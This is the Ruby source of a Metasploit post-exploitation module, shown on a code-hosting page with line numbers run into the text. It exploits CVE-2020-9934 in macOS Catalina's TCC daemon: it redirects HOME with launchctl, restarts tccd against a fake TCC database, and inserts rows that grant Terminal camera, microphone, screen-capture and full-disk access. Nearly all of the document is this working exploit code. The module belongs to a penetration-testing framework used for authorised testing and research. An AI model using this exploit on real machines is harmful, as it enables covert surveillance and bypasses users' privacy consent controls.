Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/osx/escalate/tccbypass.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67include Msf::Post::File8include Msf::Post::OSX::Priv9include Msf::Post::OSX::System1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Bypass the macOS TCC Framework',16'Description' => %q{17This module exploits a vulnerability in the TCC daemon on macOS Catalina18(<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be19manipulated (by setting the HOME environment variable) to use a new user20controlled location as the TCC database. We can then grant ourselves21entitlements by inserting them into this new database.22},23'License' => MSF_LICENSE,24'Author' => [25'mattshockl', # discovery26'timwr', # metasploit module27],28'References' => [29['CVE', '2020-9934'],30['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],31['URL', 'https://github.com/mattshockl/CVE-2020-9934'],32],33'Notes' => {34'Stability' => [CRASH_SAFE],35'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],36'Reliability' => []37},38'Platform' => [ 'osx' ],39'SessionTypes' => [ 'shell', 'meterpreter' ]40)41)42register_advanced_options([43OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])44])45end4647def check48system_version = get_system_version49unless system_version50return Exploit::CheckCode::Unknown51end5253version = Rex::Version.new(system_version)54if version >= Rex::Version.new('10.15.6')55return Exploit::CheckCode::Safe56elsif version < Rex::Version.new('10.15.0')57return Exploit::CheckCode::Unknown58else59return Exploit::CheckCode::Appears60end61end6263def run64if check != Exploit::CheckCode::Appears65fail_with Failure::NotVulnerable, 'Target is not vulnerable'66end6768unless writable? datastore['WritableDir']69fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"70end7172tmpdir = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha(8)}"73tccdir = "#{tmpdir}/Library/Application Support/com.apple.TCC"74tccdb = "#{tccdir}/TCC.db"7576print_status("Creating TCC directory #{tccdir}")77cmd_exec("mkdir -p '#{tccdir}'")78cmd_exec("launchctl setenv HOME '#{tmpdir}'")79cmd_exec('launchctl stop com.apple.tccd && launchctl start com.apple.tccd')80unless file_exist?(tccdb)81print_error("No fake TCC DB found: #{tccdb}")82fail_with Failure::NotVulnerable, 'Target is not vulnerable'83end84print_good("fake TCC DB found: #{tccdb}")8586tcc_services = [87'kTCCServiceCamera', 'kTCCServiceMicrophone', 'kTCCServiceAll', 'kTCCServiceScreenCapture', 'kTCCServiceSystemPolicyDocumentsFolder', 'kTCCService',88'kTCCServiceSystemPolicyDeveloperFiles', 'kTCCServiceSystemPolicyDesktopFolder', 'kTCCServiceSystemPolicyAllFiles', 'kTCCServiceSystemPolicyNetworkVolumes',89'kTCCServiceSystemPolicySysAdminFiles', 'kTCCServiceSystemPolicyDownloadsFolder'90]91bundle = 'com.apple.Terminal'92csreq = 'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003'93isfile = '0'94timestamp = 1.year.from_now.to_i.to_s95for service in tcc_services96sql_insert = "INSERT INTO access VALUES('#{service}', '#{bundle}', #{isfile}, 1, 1, X'#{csreq}', NULL, NULL, 'UNUSED', NULL, NULL, #{timestamp});"97sqloutput = cmd_exec("sqlite3 '#{tccdb}' \"#{sql_insert}\"")98if sqloutput && !sqloutput.empty?99print_error("Output: #{sqloutput.length}")100end101end102print_good('TCC.db was successfully updated!')103cleanup_command = 'launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd'104cleanup_command << "\nrm -rf '#{tmpdir}'"105print_status("To cleanup, run:\n#{cleanup_command}\n")106end107end108109110